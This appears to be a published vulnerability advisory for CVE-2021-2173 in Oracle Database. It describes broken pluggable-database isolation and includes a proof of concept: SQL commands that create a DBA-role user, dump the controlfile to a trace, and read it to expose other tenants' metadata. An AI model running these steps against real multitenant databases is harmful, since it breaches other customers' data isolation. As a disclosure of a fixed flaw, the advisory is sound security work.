Oracle DB Broken PDB Isolation / Metadata Exposure

2023.03.15
Credit: Emad Al-Mousa
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Title: CVE-2021-2173 – PDB Isolation is broken through metadata exposure Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c Tested Version(s): 19c Risk Level: Medium Solution Status: Fixed CVE Reference: CVE-2021-2173 Author of Advisory: Emad Al-Mousa Overview: Oracle CDB Architecture was introduced in Oracle starting from 12cR1 as a shift in their architecture to adopt Multitenancy approach for Cloud infrastructure deployment. As any other new architecture, security issues/vulnerabilities can take place. In this vulnerability I am going to show that from PDB level with account granted DBA role I can extract metadata information of other pluggable databases within the same container. ***************************************** Vulnerability Details: attacker in a pluggable database can exfiltrate metdata info. for other co-existing databases within the same container. ***************************************** Proof of Concept (PoC): I will create account called “ironman” in PDB1: sqlplus / as sysdba SQL> alter session set container=PDB1; SQL> create user ironman identified by ironman_2021; SQL> grant create session to ironman; SQL> grant dba to ironman; SQL> alter user ironman default role all; SQL> exit; Then, I will connect using ironman to PDB1 and execute the following: // dumping controlfile contents SQL> alter session set events 'immediate trace name controlf level 4'; SQL> select * from v$diag_info where NAME='Default Trace File'; SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_7387.trc'; After Inspecting the output, for example we can now know the location of SYSTEM data file for PDB2 database within the same container in addition to other information. So, from PDB1 the attacker will be able to view the metadata information of other customer’s PDB’s within the same container, this should not be happening in the first place as ISOLATION should be enforced ! ***************************************** References: https://www.oracle.com/security-alerts/cpuapr2021.html https://nvd.nist.gov/vuln/detail/CVE-2021-2173 https://databasesecurityninja.wordpress.com/2021/06/04/cve-2021-2173-pdb-isolation-is-broken-through-metadata-exposure/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top